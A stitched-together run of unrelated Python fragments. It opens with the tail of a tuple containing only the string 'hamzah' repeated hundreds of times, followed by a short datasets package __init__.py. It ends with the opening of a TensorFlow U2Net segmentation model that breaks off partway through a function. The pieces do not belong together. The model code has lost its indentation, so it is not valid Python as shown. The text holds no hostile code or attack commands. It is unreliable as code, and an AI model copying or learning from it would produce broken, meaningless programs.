"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
)
# trchime/datasets/__init__.py (repo: yatorho/trchime, license: Apache-2.0)
from .data_sets import mnist_set
from .data_sets import cifar_set
from .data_sets import faces_set

# models/u2net.py (repo: sxlyiyiyi/HuBMAP---Hacking-the-Kidney_Baseline, license: Apache-2.0)
import tensorflow as tf
from tensorflow.keras.layers import Conv2D, BatchNormalization, ReLU, add, Activation
from tensorflow.keras.layers import MaxPool2D, concatenate, UpSampling2D, Input, Dropout
from tensorflow.keras.models import Model


def conv_block(inputs, filters, kernel_size=3, strides=1, dirate=1, padding='same'):
x = Conv2D(filters, kernel_size, strides=strides, padding=padding, use_bias=False, dilation_rate=(dirate, dirate))(
inputs)
x = BatchNormalization(axis=-1)(x)
    # x = PReLU(shared_axes=[1, 2])(x)
x = ReLU()(x)
return x


def RSU7(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx3)
hx4 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx4)
hx5 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx5)
hx6 = conv_block(hx, mid_filters)
hx7 = conv_block(hx6, mid_filters)
hx6d = concatenate([hx6, hx7])
hx6d = conv_block(hx6d, mid_filters)
hx6dup = tf.compat.v1.image.resize_bilinear(hx6d, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
hx5d = concatenate([hx6dup, hx5])
hx5d = conv_block(hx5d, mid_filters)
hx5dup = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5dup, hx4])
hx4d = conv_block(hx4d, mid_filters)
hx4dup = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4dup, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou


def RSU6(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
